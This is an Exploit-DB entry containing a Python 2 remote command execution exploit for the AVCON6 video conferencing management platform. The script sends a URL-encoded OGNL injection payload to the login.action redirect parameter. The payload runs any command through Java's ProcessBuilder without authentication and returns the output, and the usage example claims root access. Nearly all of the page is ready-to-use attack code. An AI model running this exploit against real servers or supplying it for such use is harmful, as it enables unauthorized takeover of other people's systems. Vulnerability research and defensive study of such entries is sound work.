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AVCON6 systems management platform - OGNL Remote Command Execution

EDB-ID:

47379

CVE:

N/A

EDB Verified: ✘

Author:

[NASSIM ASRIR](#)

Type:

[WEBAPPS](#)

Exploit:  

Platform:

[JAVA](#)

Date:

2019-09-11

Vulnerable App:



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```
# Exploit Title: AVCON6 systems management platform - OGNL - Remote root
command execution
# Date: 10/09/2018
# Exploit Author: Nassim Asrir
# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-
b73a57122/
# CVE: N/A
# Tested On: Windows 10(64bit) / 61.0b12 (64-bit)
# Thanks to: Otmane Aarab
# Example below:
# python ./rce.py http://server:8080/ id
# Testing Target: http://server:8080/
# uid=0(root) gid=0(root)
# Vendor: http://www.epross.com/
# About the product: The AVCON6 video conferencing system is the most
complete set of systems, including multi-screen multi-split screens and
systems that are integrated with H323/SIP protocol devices. High-end video
conferencing
# software ideal for Room Base environments and performance requirements.
Multi-party video conferencing can connect thousands of people at the same
time.
# I am not responsible for any wrong use.
#####

#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib

def exploit(url, cmd):
    payload = 'login.action?redirect:'
    payload +=
'${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]
{%22'+cmd+'%22}))}.'
    payload += 'start(),%23b%3d%23a.getInputStream(), '
    payload += '%23c%3dnew%20java.io.InputStreamReader(%23b), '
    payload +=
'%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d'
    payload += '.read(%23e),%23matt%3d%23context.'
    payload +=
'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27), '
    payload += '%23matt.getWriter().println(%23e),%23matt.'
    payload += 'getWriter().flush(),%23matt.getWriter()'
    payload += '.close()}'

    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:45.0) Gecko/20100101 Firefox/45.0'}
        request = urllib2.Request(url+payload, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page

if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py http://target/ id")
    else:
        print('[*] Avcon6-Preauh-Remote Command Execution')
        url = sys.argv[1]
```

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```
cmd = sys.argv[2]
print("[*] Executed Command: %s\n" % cmd)
print("[*] Target: %s\n" % url)
exploit(url, cmd)
```

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